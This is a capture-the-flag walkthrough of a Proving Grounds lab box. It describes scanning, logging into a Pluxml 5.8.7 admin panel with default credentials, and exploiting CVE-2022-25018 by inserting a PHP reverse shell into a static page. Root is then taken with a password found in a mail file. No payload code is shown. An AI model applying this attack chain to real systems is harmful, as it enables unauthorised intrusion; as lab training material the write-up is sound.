Enumeration

Nmap

Initial nmap scan revealed SSH and HTTP ports were open.

00 - nmap

Web Enumeration

Website was Pluxml website. To understand the version I applied endpoint brute force with versioning_metafiles.txt file and found README.md file.

01 - versionin

It was Pluxml 5.8.7

02 - version

Then I searched for login page and found it was at /core/admin endpoint.

03 - login page

Then I tried admin:admin credentials and it worked.

04 - login page

05 - logged in

Exploitation

CVE-2022-25018

Pluxml v5.8.7 was discovered to allow attackers to execute arbitrary code via crafted PHP code inserted into static pages.

Some research revealed we could obtain RCE because this version was vulnerable. Then I found this repo (MoritzHuppert/CVE-2022-25018) which explains how we can exploit the vulnerability.

06 - exploit

So I simply edited a static page and put pentestmonkey/php-reverse-shell in it by updating IP value.

07 - edit

And visiting the static page got me reverse shell as www-data.

08 - revshell

Then I read the local flag inside /var/www folder.

09 - local flag

Privilege Escalation

Mail (/var/spool/mail)

I checked SUID binaries and found exim4 binary which is a mail client.

10 - sus exim

Then I checked its version with exim4 -bV and searching the version online revealed it was not vulnerable.

11 - exim version

Later, I checked /var/spool/mail directory and found there was a mail record for www-data. So I read it and it included root password.

12 - mail

I simply obtained root shell.

13 - gg

<
Previous Post
Hepet - Proving Grounds Practice
>
Next Post
PyLoader - Proving Grounds Practice